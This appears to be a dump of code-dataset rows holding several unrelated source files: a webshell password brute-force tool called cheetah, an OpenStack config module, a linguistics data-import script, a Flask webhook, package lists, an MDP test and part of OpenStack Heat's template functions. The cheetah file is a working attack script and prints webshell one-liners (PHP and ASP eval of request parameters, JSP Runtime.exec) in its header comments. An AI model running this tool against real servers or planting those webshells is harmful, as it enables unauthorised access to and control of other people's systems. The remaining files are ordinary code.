repo_name (string, 5-92 chars) | path (string, 4-232 chars) | copies (19 classes) | size (string, 4-7 chars) | content (string, 721-1.04M chars) | license (15 classes) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51-99.9) | line_max (int64, 15-997) | alpha_frac (float64, 0.25-0.97) | autogenerated (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---|
sunnyelf/cheetah | cheetah.py | 1 | 22333 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Cheetah is a dictionary-based webshell password brute-force tool
that hunts for passwords as swiftly and fiercely as a cheetah hunts prey.
Cheetah works by submitting a large number of candidate passwords
for the target web service in a single request, so its cracking
efficiency is thousands of times that of other common webshell
password brute-force tools.
"""
# payload format
# php: => <?php @eval($_GET['sunnyelf']);?> or <?php @eval($_POST['sunnyelf']);?>
# http://localhost/shell_get.php?pwd=$s=pwd;print($s);&sunnyelf=$s=sunnyelf;print($s);
# asp: => <%eval request("sunnyelf")%>
# http://localhost/shell.asp?pwd=response.write("pwd")&sunnyelf=response.write("sunnyelf")
# aspx: => <%@ Page Language="Jscript"%><%eval(Request.Item["sunnyelf"]);%>
# http://localhost/shell.aspx?pwd=Response.Write("pwd");&sunnyelf=Response.Write("sunnyelf")
# jsp: => <%Runtime.getRuntime().exec(request.getParameter("sunnyelf"));%>
# http://localhost/shell.jsp?pwd=System.out.println("pwd");&sunnyelf=System.out.println("sunnyelf");
import os
import re
import sys
import time
import signal
import string
import random
import requests
import argparse
__program__ = 'cheetah'
__version__ = '1.0.0'
__license__ = 'GNU GPLv3'
__author__ = 'sunnyelf[@hackfun.org]'
__github__ = 'https://github.com/sunnyelf/cheetah'
red = '\033[1;31m'
green = '\033[1;32m'
yellow = '\033[1;33m'
white = '\033[1;37m'
reset = '\033[0m'
def set_coding():
if sys.version_info.major == 2:
if sys.getdefaultencoding() is not 'utf-8':
reload(sys)
sys.setdefaultencoding('utf-8')
def print_highlight(message):
times = get_time()
msg_level = {'INFO': green, 'HINT': white, 'WARN': yellow, 'ERROR': red}
for level, color in msg_level.items():
if level in message:
print(color+times+message+reset)
return
print(white+times+message+reset)
return
def get_time():
return '[' + time.strftime("%H:%M:%S", time.localtime()) + '] '
def exit_cheetah(signum, frame):
print_highlight('[HINT] you pressed the Ctrl + C key to terminate cheetah')
print_highlight('[INFO] the cheetah end execution')
exit(signum)
def print_info():
print('program: ' + __program__)
print('version: ' + __version__)
print('license: ' + __license__)
print('author: ' + __author__)
print('github: ' + __github__)
print('')
print('description: ' + __doc__)
def print_banner():
banner = r"""
_________________________________________________
______ _____ ______
__________ /_ _____ _____ __ /_______ ____ /_
_ ___/__ __ \_ _ \_ _ \_ __/_ __ \ __ __ \
/ /__ _ / / // __// __// /_ / /_/ / _ / / /
\___/ / / /_/ \___/ \___/ \__/ \____/ / / /_/
/_/ /_/
a very fast brute force webshell password tool.
"""
print(white+banner+reset)
def read_chunks(pwd_file):
with open(pwd_file) as pwd_file:
while 1:
chunk_data = pwd_file.read(100 * 1024 * 1024)
if not chunk_data:
break
yield chunk_data
def process_pwd_file(options):
for i in range(len(options.pwd_file_list)):
file_name = options.pwd_file_list[i]
print_highlight('[INFO] removing duplicate rows in '+file_name)
time_str = str(time.strftime("%y-%m-%d(%H,%M,%S)_", time.localtime()))
new_file_name = 'data/solved_at_' + time_str + os.path.basename(file_name)
with open(new_file_name, 'a') as new_file:
for chunk in read_chunks(file_name):
new_file.write('\n'.join(set(chunk.split())).lower())
options.pwd_file_list[i] = new_file_name
print_highlight('[HINT] duplicate rows have been removed')
return
def gen_random_header(options):
if options.verbose:
print_highlight('[INFO] generating a random request header')
with open('data/user-agent.list') as agent_file:
agent_list = agent_file.readlines()
random_agent = random.choice(agent_list).replace('\n', '')
reg = '[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-zA-Z0-9][-a-zA-Z0-9]{0,62})+'
header = {'Host': re.search(reg, options.url).group(0),
'User-Agent': random_agent,
'Accept': '*/*',
'Accept-Encoding': '*',
'Accept-Language': '*',
'Cache-Control': 'no-cache',
'Connection': 'keep-alive'}
return header
def req_get(payload, times, options):
header = gen_random_header(options)
if options.time != 0:
print_highlight('[HINT] sleeping '+str(options.time)+' seconds to request')
time.sleep(options.time)
if options.verbose:
print_highlight('[INFO] getting '+str(times)+'th group payload to '+options.url)
print_highlight('[HINT] waiting for web server response')
try:
r = requests.get(url=options.url,
headers=header,
params=payload,
timeout=10,
verify=False)
except Exception as e:
print_highlight(e.message)
return 'error'
error_msg = '[ERROR] '+options.url+' response code: '+str(r.status_code)
if r.status_code == 404:
print_highlight(error_msg)
print_highlight('[WARN] maybe the request url incorrect')
print_highlight('[HINT] try to check the url '+options.url)
return 'error'
code = [413, 414, 500]
if r.status_code in code:
print_highlight(error_msg)
print_highlight('[WARN] request url too long when request '+options.url)
print_highlight('[HINT] try to specify a smaller value of parameter -n')
return 'error'
if r.status_code in range(200, 300):
pwd_hint = '[HINT] password of '+options.url
print_highlight('[INFO] web server responds successfully')
if r.text in payload:
print(white+get_time()+pwd_hint+' is '+reset+red+r.text+reset)
with open('data/find.list', 'a') as find_file:
find_file.write(options.url+'\t\t'+r.text+'\n')
print_highlight('[HINT] password has been written to data/find.list file')
return 'find'
else:
if options.verbose:
print_highlight(pwd_hint+' not in '+str(times)+' th group payload')
return 'notfind'
else:
print_highlight(error_msg)
return 'error'
def req_post(payload, times, options):
header = gen_random_header(options)
if options.time != 0:
print_highlight('[HINT] sleeping '+str(options.time)+' seconds to request')
time.sleep(options.time)
if options.verbose:
print_highlight('[INFO] posting '+str(times)+'th group payload to '+options.url)
print_highlight('[HINT] waiting for web server response')
try:
r = requests.post(url=options.url,
headers=header,
data=payload,
timeout=10,
verify=False)
except Exception as e:
print_highlight('[ERROR] '+str(e))
return 'error'
error_msg = '[ERROR] '+options.url+' response code: '+str(r.status_code)
if r.status_code == 404:
print_highlight(error_msg)
print_highlight('[WARN] maybe the request url incorrect')
print_highlight('[HINT] try to check the url '+options.url)
return 'error'
code = [413, 414, 500]
if r.status_code in code:
print_highlight(error_msg)
print_highlight('[WARN] request url too long when request '+options.url)
print_highlight('[HINT] try to specify a smaller value of parameter -n')
return 'error'
if r.status_code in range(200, 300):
pwd_hint = '[HINT] the password of ' + options.url
if options.verbose:
print_highlight('[INFO] web server responds successfully')
if r.text in payload:
print(white+get_time()+pwd_hint+' is '+reset+red+r.text+reset)
with open('data/find.list', 'a') as find_file:
find_file.write(options.url+'\t\t'+r.text+'\n')
print_highlight('[HINT] password has been written to data/find.list')
return 'find'
else:
if options.verbose:
print_highlight(pwd_hint+' not in '+str(times)+' th group payload')
return 'notfind'
else:
print_highlight(error_msg)
return 'error'
def detect_web(options):
print_highlight('[WARN] not specify the web server or shell type')
print_highlight('[INFO] detecting server info of '+options.url)
server_list = ['apache', 'nginx', 'iis']
shell_list = ['php', 'aspx', 'asp', 'jsp']
header = gen_random_header(options)
web_hint = '[HINT] web server may be '
shell_hint = '[HINT] the shell type may be '
if options.shell == 'detect':
for shell in shell_list:
if shell in options.url.lower():
print_highlight(shell_hint+shell)
options.shell = shell
break
if options.server == 'detect' or options.shell == 'detect':
try:
get_rsp = requests.get(url=options.url, headers=header, verify=False)
except Exception as e:
print_highlight('[ERROR] '+str(e))
return 'error'
if 'server' in get_rsp.headers:
print_highlight(web_hint+get_rsp.headers['server'])
options.server = get_rsp.headers['server'].lower()
if 'x-powered-by' in get_rsp.headers:
power_hint = '[HINT] web server may be x-powered-by '
print_highlight(power_hint+get_rsp.headers['x-powered-by'])
if options.shell == 'detect':
for shell in shell_list:
if shell in get_rsp.headers['x-powered-by'].lower():
print_highlight(shell_hint+shell)
options.shell = shell
break
if options.server == 'detect':
for server in server_list:
if server in get_rsp.headers['x-powered-by'].lower():
print_highlight(web_hint+server)
options.server = server
break
if options.server == 'detect':
random_str = str(random.sample(string.printable, 5)).encode('hex')
reg = 'http(s)?:\/\/[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-zA-Z0-9][-a-zA-Z0-9]{0,62})+'
random_url = re.search(reg, options.url).group(0) + random_str
random_rsp = requests.get(url=random_url, headers=header, verify=False)
if random_rsp.status_code == 404:
for server in server_list:
if server in str(random_rsp.text).lower():
print_highlight(web_hint+server)
options.server = server
break
if options.server == 'detect':
put_rsp = requests.put(url=options.url, headers=header)
if put_rsp.status_code == 405 or put_rsp.status_code == 411:
options.server = 'nginx'
print_highlight(web_hint+options.server)
if put_rsp.status_code == 200:
options.server = 'apache'
print_highlight(web_hint+options.server)
if options.server == 'detect':
del_rsp = requests.delete(url=options.url, headers=header)
if del_rsp.status_code == 501:
options.server = 'iis'
print_highlight(web_hint+options.server)
if del_rsp.status_code == 403:
options.server = 'apache'
print_highlight(web_hint+options.server)
def set_max_req(options):
if options.max_request is None:
print_highlight('[WARN] you did not specify the maximum request parameter')
server_dict = {'apache': {'post': 1000, 'get': 100},
'nginx': {'post': 1000, 'get': 756},
'iis': {'post': 4000, 'get': 45}}
for server in server_dict:
if server in options.server:
print_highlight('[INFO] setting the number of request parameters '
+ str(server_dict[server][options.req_type]))
options.max_request = server_dict[server][options.req_type]
break
if options.max_request is None:
if options.req_type == 'post':
print_highlight('[INFO] the web server '+options.server+' '+options.req_type+' default setting 10000')
options.max_request = 1000
if options.req_type == 'get':
print_highlight('[INFO] the web server '+options.server+' '+options.req_type+' default setting 100')
options.max_request = 100
def dict_attack(options):
if options.server == 'detect' or options.shell == 'detect':
if detect_web(options) == 'error':
return 'error'
set_max_req(options)
pwd_file_find = ''
for pwd_file_name in options.pwd_file_list:
print_highlight('[INFO] opening password file '+pwd_file_name)
try:
pwd_file = open(pwd_file_name)
except Exception as e:
print_highlight('[ERROR]'+str(e))
print_highlight('[INFO] the cheetah end execution')
exit(1)
print_highlight('[HINT] using password file '+pwd_file_name)
print_highlight('[INFO] cracking password of '+options.url)
payload = dict()
times = 1
pwd_find = ''
for pwd in pwd_file:
pwd = pwd.replace('\n', '')
if options.shell == 'php':
payload[pwd] = '$s='+pwd+';print($s);'
if options.shell == 'asp':
payload[pwd] = 'response.write("'+pwd+'")'
if options.shell == 'aspx':
payload[pwd] = 'Response.Write("'+pwd+'");'
if options.shell == 'jsp':
payload[pwd] = 'System.out.println("'+pwd+'");'
if len(payload) == options.max_request:
if options.req_type == 'post':
res = req_post(payload, times, options)
if res == 'find':
pwd_find = 'find'
break
if res == 'error':
pwd_find = 'error'
break
if options.req_type == 'get':
res = req_get(payload, times, options)
if res == 'find':
pwd_find = 'find'
break
if res == 'error':
pwd_find = 'error'
break
payload.clear()
times += 1
if len(payload) < options.max_request:
if options.req_type == 'post':
res = req_post(payload, times, options)
if res == 'find':
pwd_file_find = 'find'
break
if res == 'error':
pwd_file_find = 'error'
break
if options.req_type == 'get':
res = req_get(payload, times, options)
if res == 'find':
pwd_file_find = 'find'
break
if res == 'error':
pwd_file_find = 'error'
break
pwd_file.close()
if pwd_find == 'find':
pwd_file_find = 'find'
break
if pwd_find == 'error':
pwd_file_find = 'error'
break
if pwd_file_find == 'find':
return 'find'
if pwd_file_find == 'error':
return 'error'
print_highlight('[WARN] the cheetah did not find the webshell password')
print_highlight('[HINT] try to change a better password dictionary file')
print_highlight('[HINT] try to specify a smaller value of parameter -n')
if options.req_type == 'post':
print_highlight('[HINT] try to specify parameter -r for GET request')
if options.req_type == 'get':
print_highlight('[HINT] try to specify parameter -r for POST request')
def main():
set_coding()
print_banner()
if len(sys.argv) == 1:
print('[*] try to use -h or --help show help message')
exit(1)
parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter,
epilog='''\
use examples:
python cheetah.py -u http://orz/orz.php
python cheetah.py -u http://orz/orz.jsp -r post -n 1000 -v
python cheetah.py -u http://orz/orz.asp -r get -c -p data/pwd.list
python cheetah.py -u http://orz/orz -w aspx -s iis -n 1000
python cheetah.py -b url.list -c -p pwd1.list pwd2.list -v''')
parser.add_argument('-i', '--info', action='store_true', dest='info',
help='show information of cheetah and exit')
parser.add_argument('-v', '--verbose', action='store_true', dest='verbose',
help='enable verbose output(default disabled)')
parser.add_argument('-c', '--clear', action='store_true', dest='remove',
help='clear duplicate password(default disabled)')
parser.add_argument('-up', '--update', action='store_true', dest='update',
help='update cheetah')
parser.add_argument('-r', '--request', default='post', dest='req_type',
choices=['GET', 'get', 'POST', 'post'], metavar='',
help="specify request method(default POST)")
parser.add_argument('-t', '--time', type=float, default=0,
dest='time', metavar='',
help='specify request interval seconds(default 0)')
parser.add_argument('-w', '--webshell', default='detect', metavar='',
choices=['php', 'asp', 'aspx', 'jsp'],
help="specify webshell type(default auto-detect)",
dest='shell')
parser.add_argument('-s', '--server', default='detect',
dest='server', metavar='',
choices=['apache', 'nginx', 'iis'],
help="specify web server name(default auto-detect)")
parser.add_argument('-n', '--number', type=int,
dest='max_request', metavar='',
help='specify the number of request parameters')
parser.add_argument('-u', '--url', metavar='', dest='url',
help='specify the webshell url')
parser.add_argument('-b', '--url-file', dest='url_file', metavar='',
help='specify batch webshell urls file')
parser.add_argument('-p', nargs='+', default='data/pwd.list',
dest='pwd_file_list', metavar='FILE',
help='specify password file(default pwd.list)')
options = parser.parse_args()
if options.update:
abs_dir = os.path.dirname(os.path.abspath(__file__))
if os.path.exists(os.path.join(abs_dir, '.git')):
print('[*] hint: use "git pull origin master" update cheetah')
exit(0)
if not os.path.isfile(os.path.join(abs_dir, 'update.py')):
print('[!] error: can not find file update.py')
print('[*] hint: use "git clone '+__github__+'.git" to update')
print('[*] hint: open link '+__github__+' with browser to download')
exit(0)
else:
print('[*] hint: try to use "python update.py" to update cheetah')
exit(0)
if options.info:
print_info()
exit(0)
if options.url is None and options.url_file is None:
print('[!] error: the argument -u or -uf is required')
exit(1)
if isinstance(options.pwd_file_list, str):
options.pwd_file_list = [options.pwd_file_list]
options.req_type = options.req_type.lower()
options.server = options.server.lower()
print_highlight('[INFO] the cheetah start execution')
signal.signal(signal.SIGINT, exit_cheetah)
if options.verbose:
print_highlight('[INFO] using verbose mode')
if options.remove:
process_pwd_file(options)
if options.req_type == 'post':
print_highlight('[HINT] using POST request mode')
if options.req_type == 'get':
print_highlight('[HINT] using GET request mode')
if options.time < 0 or options.time > 3600:
print_highlight('[ERROR] invalid request interval time '+str(options.time))
print_highlight('[HINT] valid request interval seconds is 0 ~ 3600')
print_highlight('[INFO] the cheetah end execution')
exit(1)
print_highlight('[HINT] setting request interval seconds '+str(options.time))
if options.url is not None:
print_highlight('[HINT] using dictionary-based password attack')
print_highlight('[INFO] cracking password of '+options.url)
attack_res = dict_attack(options)
if attack_res == 'find' or attack_res == 'error':
pass
if options.url_file is not None:
print_highlight('[HINT] using batch cracking mode')
print_highlight('[INFO] opening urls file '+options.url_file)
with open(options.url_file) as url_file:
print_highlight('[INFO] using urls file '+options.url_file)
print_highlight('[HINT] using dictionary-based password attack')
for url_line in url_file:
options.url = url_line.replace('\n', '')
attack_res = dict_attack(options)
if attack_res == 'find' or attack_res == 'error':
continue
print_highlight('[INFO] the cheetah end execution')
if __name__ == '__main__':
main()
| gpl-3.0 | -6,054,936,873,131,986,000 | 38.828154 | 114 | 0.53862 | false |
savi-dev/quantum | quantum/plugins/ryu/common/config.py | 1 | 1388 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from quantum.openstack.common import cfg
database_opts = [
cfg.StrOpt('sql_connection', default='sqlite://'),
cfg.IntOpt('reconnect_interval', default=2),
]
ovs_opts = [
cfg.StrOpt('integration_bridge', default='br-int'),
cfg.StrOpt('openflow_controller', default='127.0.0.1:6633'),
cfg.StrOpt('openflow_rest_api', default='127.0.0.1:8080'),
]
agent_opts = [
cfg.IntOpt('polling_interval', default=2),
cfg.StrOpt('root_helper', default='sudo'),
]
def parse(config_file):
conf = cfg.ConfigOpts()
conf(args=[], default_config_files=[config_file])
conf.register_opts(database_opts, "DATABASE")
conf.register_opts(ovs_opts, "OVS")
conf.register_opts(agent_opts, "AGENT")
return conf
| apache-2.0 | -5,678,480,904,733,669,000 | 31.27907 | 78 | 0.693084 | false |
digling/sinotibetan | datasets/TBL/import.py | 1 | 3518 | # author : Johann-Mattis List
# email : [email protected]
# created : 2015-04-27 13:03
# modified : 2015-04-27 13:03
"""
import new data (TBL)
"""
__author__="Johann-Mattis List"
__date__="2015-04-27"
from lingpy import *
from lingpyd.plugins.lpserver.lexibase import LexiBase,load_sqlite
changes = dict([
('the breast','the breast (female)'),
('the hair', 'the hair (of the head)'),
('to plant','to plant (vegetals, rice)'),
('we [first person plural]', 'we [first person plural inclusive]'),
])
base = csv2list('matches.tsv')
_groups = csv2list('tbl.languages.tsv')
groups = {}
for g in _groups:
groups[g[1].strip()] = g[3].split(' - ')[1]
clean = lambda x: ''.join([y for y in x if y not in '[]()?{}']).replace(' ','_')
wl = LexiBase(load_sqlite('sinotibetan', 'sinotibetan.sqlite3',
url='http://tsv.lingpy.org/triples/sinotibetan.sqlite3'
))
for k in wl:
concept = wl[k,'concept']
if concept in changes:
wl[k][wl.header['concept']] = changes[concept]
wl.add_entries('taxon_name_in_source','doculect',lambda x: x)
wl2 = Wordlist('tbl-stdb.tsv')
wl2.add_entries('source','ipa',lambda x: 'STEDT/TBL')
wl2.add_entries('STEDT_TAXON_NAME', 'doculect', lambda x:x)
for k in wl2:
wl2[k][wl2.header['doculect']] = clean(wl2[k,'taxa'])
wl2.add_entries('subgroup', 'stedt_taxon_name', lambda x: groups[x])
wl2.output('tsv', filename='tbl-update', subset=True, rows=dict(
subgroup = '!= "Burmish"', ipa = '!= "*"'))
wl2 = Wordlist('tbl-update.tsv')
blacklist = []
for k in wl.taxa:
entries = wl.get_list(doculect=k, entry='ipa', flat=True)
if len(set(entries)) < 10:
blacklist += wl.get_list(doculect=k, flat=True)
commons = [t for t in wl.taxa if t in wl2.taxa]
for k in wl:
if wl[k,'taxa'] in commons or wl[k,'subgroup'] == 'Burmish':
blacklist += [k]
wl.blacklist = blacklist
wl.add_data(wl2)
check = lambda x: ''.join([y for y in x if y not in '*?!- ']).strip()
D = {}
D[0] = sorted(wl.header, key=lambda x: wl.header[x])
for k in wl:
if k not in blacklist and check(wl[k,'ipa']):
D[k] = wl[k]
wln = LexiBase(D)
wln.create('sinotibetan', dbase='sinotibetan.sqlite3')
#wl.output('tsv', filename='sinotibetan-dbase', subset=True, rows=dict(
# ID = 'not in '+str(blacklist)))
#wl.create('sinotibetan', dbase='sinotibetan.sqlite3', ignore=False)
#import os
#os.system('mv sinotibetan.sqlite3 ~/projects/websites/dighl/triples/')
#
#
## in later steps:
## re-link the data
#db = LexiBase('sinotibetan.sqlite3')
#txt1 = ''
#concepts = sorted(set([db[k,'concept'] for k in db]))
#for c in concepts:
#
# # determine coverage
# cov = len([db[k,'concept'] for k in db if db[k,'concept'] == c])
# if cov > 7:
# txt1 += '<option value="'+c+'" selected>'+c+' ('+str(cov)+')</option>'
# else:
# txt1 += '<option value="'+c+'">'+c+'('+str(cov)+')</option>'
#
#txt2 = ''
#langs = [db[k,'taxon'] for k in db]
#langs = sorted(set(langs))
#
#for k in langs:
# txt2 += '<option value="'+k+'">'+k+'</option>'
#
#txt3 = ''
#for col in sorted(db.header, key=lambda x: db.header[x]):
# txt3 += '<option value="'+col.upper()+'" selected>'+col.upper()+'</option>'
#
#with open('website/index.template.html') as f:
# d = f.read()
# d = d.format(JS=open('website/stb.js').read(),
# DOCULECTS = txt2,
# CONCEPTS = txt1,
# CONTENT = txt3
# )
#with open('website/index.html', 'w') as f:
# f.write(d)
| gpl-2.0 | 1,753,425,669,453,039,900 | 28.563025 | 80 | 0.59892 | false |
ashokpsg/apiai-weather-webhook-sample | app.py | 1 | 3046 | #!/usr/bin/env python
import urllib
import json
import os
import sys
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
res = processRequest(req)
print("Request processed")
res = json.dumps(res, indent=4)
print(res)
r = make_response(res)
print(r)
r.headers['Content-Type'] = 'application/json'
return r
def processRequest(req):
if req.get("result").get("action") != "createCheckBook":
return {}
baseurl = "https://ldcif6u.wdf.sap.corp:44304/sap/opu/odata/sap/ZIVRC_SRV/WorkItems("
print(baseurl)
yql_query = makeYqlQuery(req)
print("yql_query1:")
print(yql_query)
if yql_query is None:
return {}
yql_url = baseurl + urllib.urlencode({yql_query}) + "?$format=json"
print(yql_query)
result = urllib.urlopen(baseurl).read()
print(result)
data = json.loads(result)
print("data1:")
print(data)
res = makeWebhookResult(data)
return res
def makeYqlQuery(req):
result = req.get("result")
print("result1:")
print(result)
parameters = result.get("parameters")
print("parameters1:")
print(parameters)
city = parameters.get("workitemtype")
print("City1:")
print(city)
if city is None:
return None
return "guid'" + "0005EEE4-48CC-1ED5-B0C9-FA163EA701AC" + "')"
#return "select * from weather.forecast where woeid in (select woeid from geo.places(1) where text='" + city + "')"
def makeWebhookResult(data):
print("MakeWebhook method")
query = data.get('d')
print("Query1:")
print(query)
if query is None:
return {}
result = query.get('WORKITEM_ID')
if result is None:
return {}
channel = query.get('DESCRIPTION')
if channel is None:
return {}
# item = channel.get('item')
# location = channel.get('location')
# units = channel.get('units')
# if (location is None) or (item is None) or (units is None):
# return {}
# condition = item.get('condition')
# if condition is None:
# return {}
# print(json.dumps(item, indent=4))
# speech = "Today in " + location.get('city') + ": " + condition.get('text') + \
# ", the temperature is " + condition.get('temp') + " " + units.get('temperature')
speech = " The Work Item No. " + result + " has been created for " + channel
print("Response1:")
print(speech)
return {
"speech": speech,
"displayText": speech,
# "data": data,
# "contextOut": [],
"source": "apiai-weather-webhook-sample"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print "Starting app on port %d" % port
app.run(debug=False, port=port, host='0.0.0.0')
| apache-2.0 | 3,322,779,132,360,774,700 | 23.174603 | 118 | 0.599146 | false |
aroth-arsoft/arsoft-meta-packages | grp_libreoffice.py | 1 | 2414 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# kate: space-indent on; indent-width 4; mixedindent off; indent-mode python;
libreoffice = [
{'name':'common',
'mainpackage':True,
'shortdesc':'Installs LibreOffice',
'description':'',
'side-by-side':['german', 'english', 'gnome', 'kde'],
'packages':['libreoffice', 'libreoffice-calc', 'libreoffice-math',
'libreoffice-writer', 'libreoffice-impress', 'libreoffice-draw',
'libreoffice-base', 'libreoffice-pdfimport', 'libreoffice-base-core',
'libreoffice-core',
'libreoffice-officebean',
'libreoffice-style-hicontrast',
'libreoffice-style-breeze', 'libreoffice-style-oxygen',
'hunspell-dictionary', 'myspell-dictionary',
'pstoedit']
},
{'name':'english',
'shortdesc':'Installs english language and help files for LibreOffice',
'description':'',
'depends':['common'],
'side-by-side':['german', 'gnome', 'kde'],
'packages':['aspell-en', 'wamerican-large', 'wbritish-large', 'mythes-en-us', 'mythes-en-au',
'hyphen-en-gb', 'hyphen-en-us',
'libreoffice-l10n-en-gb',
]
},
{'name':'german',
'shortdesc':'Installs german language and help files for LibreOffice',
'description':'',
'depends':['common'],
'side-by-side':['english', 'gnome', 'kde'],
'packages':['wngerman', 'aspell-de', 'mythes-de', 'hyphen-de',
'libreoffice-l10n-de'
]
},
{'name':'gnome',
'shortdesc':'Installs GNOME support files for LibreOffice',
'description':'',
'depends':['common'],
'side-by-side':['kde', 'english', 'german'],
'packages':['libreoffice-gnome'],
},
{'name':'kde',
'shortdesc':'Installs KDE support files for LibreOffice',
'description':'',
'depends':['common'],
'side-by-side':['gnome', 'english', 'german'],
'packages':['libreoffice-kde'],
},
{'name':'none',
'shortdesc':'Uninstalls LibreOffice',
'description':'',
'packages':[],
'noconflicts':['pstoedit',
'hunspell-dictionary', 'myspell-dictionary',
'aspell-en', 'wamerican-large', 'wbritish-large',
'mythes-en-us', 'mythes-en-au', 'mythes-de',
'hyphen-en-gb', 'hyphen-en-us', 'hyphen-de',
'wngerman', 'aspell-de']
},
]
| gpl-3.0 | 2,647,278,325,148,330,000 | 35.575758 | 97 | 0.562138 | false |
zafarali/emdp | tests/test_chain_MDP.py | 1 | 1393 | from emdp import build_chain_MDP
import numpy as np
def test_build_chain_MDP():
mdp = build_chain_MDP(n_states=3, starting_distribution=np.array([0, 0, 1]),
terminal_states=[0], reward_spec=[(1, 0, +5)], p_success=0.9)
"""
this MDP looks like this:
[ 0 ] --> [ 0 ] with probability 1 for all actions
[ 1 ] --> [ 2 ] with probability 0.9 if taking RIGHT
[ 1 ] --> [ 0 ] with probability 0.9 if taking LEFT (also gets a reward of +5)
[ 2 ] --> [ 2 ] with probability 1 if taking RIGHT
[ 2 ] --> [ 1 ] with probability 0.9 if taking LEFT
"""
assert mdp.P[0][0][0] == 1 and mdp.P[0][1][0] == 1, 'terminal state is non absorbing.'
assert np.allclose(mdp.P[1][0], np.array([0.9, 0.1, 0])), 'taking the action LEFT from state 1 should go to state 0 with prob 0.9'
assert np.allclose(mdp.P[2][1], np.array([0, 0, 1])), 'taking the action RIGHT from state 2 should go to state 2 with prob 1'
assert np.allclose(mdp.P[2][0], np.array([0, 0.9, 0.1])), 'taking the action LEFT from state 2 should go to state 1 with prob 0.9'
assert np.allclose(mdp.R[0][:], 0), 'No reward from terminal state'
assert mdp.R[1][0] == +5, 'taking LEFT from state 1 should give +5 reward'
assert mdp.R[1][1] == 0, 'taking RIGHT from state 1 should give 0 reward'
assert np.allclose(mdp.R[2][:], 0), 'No reward from other states'
| mit | -5,542,290,806,926,931,000 | 59.565217 | 134 | 0.615937 | false |
steveb/heat | heat/engine/hot/functions.py | 1 | 27032 | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import hashlib
import itertools
from oslo_config import cfg
from oslo_serialization import jsonutils
import six
import yaql
from yaql.language import exceptions
from heat.common import exception
from heat.common.i18n import _
from heat.engine import attributes
from heat.engine.cfn import functions as cfn_funcs
from heat.engine import function
opts = [
cfg.IntOpt('limit_iterators',
default=200,
help=_('The maximum number of elements in collection '
'expression can take for its evaluation.')),
cfg.IntOpt('memory_quota',
default=10000,
help=_('The maximum size of memory in bytes that '
'expression can take for its evaluation.'))
]
cfg.CONF.register_opts(opts, group='yaql')
class GetParam(function.Function):
"""A function for resolving parameter references.
Takes the form::
get_param: <param_name>
or::
get_param:
- <param_name>
- <path1>
- ...
"""
def __init__(self, stack, fn_name, args):
super(GetParam, self).__init__(stack, fn_name, args)
self.parameters = self.stack.parameters
def result(self):
args = function.resolve(self.args)
if not args:
raise ValueError(_('Function "%s" must have arguments') %
self.fn_name)
if isinstance(args, six.string_types):
param_name = args
path_components = []
elif isinstance(args, collections.Sequence):
param_name = args[0]
path_components = args[1:]
else:
raise TypeError(_('Argument to "%s" must be string or list') %
self.fn_name)
if not isinstance(param_name, six.string_types):
raise TypeError(_('Parameter name in "%s" must be string') %
self.fn_name)
try:
parameter = self.parameters[param_name]
except KeyError:
raise exception.UserParameterMissing(key=param_name)
def get_path_component(collection, key):
if not isinstance(collection, (collections.Mapping,
collections.Sequence)):
raise TypeError(_('"%s" can\'t traverse path') % self.fn_name)
if not isinstance(key, (six.string_types, int)):
raise TypeError(_('Path components in "%s" '
'must be strings') % self.fn_name)
if isinstance(collection, collections.Sequence
) and isinstance(key, six.string_types):
try:
key = int(key)
except ValueError:
raise TypeError(_("Path components in '%s' "
"must be a string that can be "
"parsed into an "
"integer.") % self.fn_name)
return collection[key]
try:
return six.moves.reduce(get_path_component, path_components,
parameter)
except (KeyError, IndexError, TypeError):
return ''
class GetAttThenSelect(cfn_funcs.GetAtt):
"""A function for resolving resource attributes.
Takes the form::
get_attr:
- <resource_name>
- <attribute_name>
- <path1>
- ...
"""
def _parse_args(self):
if (not isinstance(self.args, collections.Sequence) or
isinstance(self.args, six.string_types)):
raise TypeError(_('Argument to "%s" must be a list') %
self.fn_name)
if len(self.args) < 2:
raise ValueError(_('Arguments to "%s" must be of the form '
'[resource_name, attribute, (path), ...]') %
self.fn_name)
self._path_components = self.args[2:]
return tuple(self.args[:2])
def result(self):
attribute = super(GetAttThenSelect, self).result()
if attribute is None:
return None
path_components = function.resolve(self._path_components)
return attributes.select_from_attribute(attribute, path_components)
def dep_attrs(self, resource_name):
if self._resource().name == resource_name:
path = function.resolve(self._path_components)
attr = [function.resolve(self._attribute)]
if path:
attrs = [tuple(attr + path)]
else:
attrs = attr
else:
attrs = []
return itertools.chain(function.dep_attrs(self.args, resource_name),
attrs)
class GetAtt(GetAttThenSelect):
"""A function for resolving resource attributes.
Takes the form::
get_attr:
- <resource_name>
- <attribute_name>
- <path1>
- ...
"""
def result(self):
path_components = function.resolve(self._path_components)
attribute = function.resolve(self._attribute)
r = self._resource()
if (r.status in (r.IN_PROGRESS, r.COMPLETE) and
r.action in (r.CREATE, r.ADOPT, r.SUSPEND, r.RESUME,
r.UPDATE, r.CHECK, r.SNAPSHOT)):
return r.FnGetAtt(attribute, *path_components)
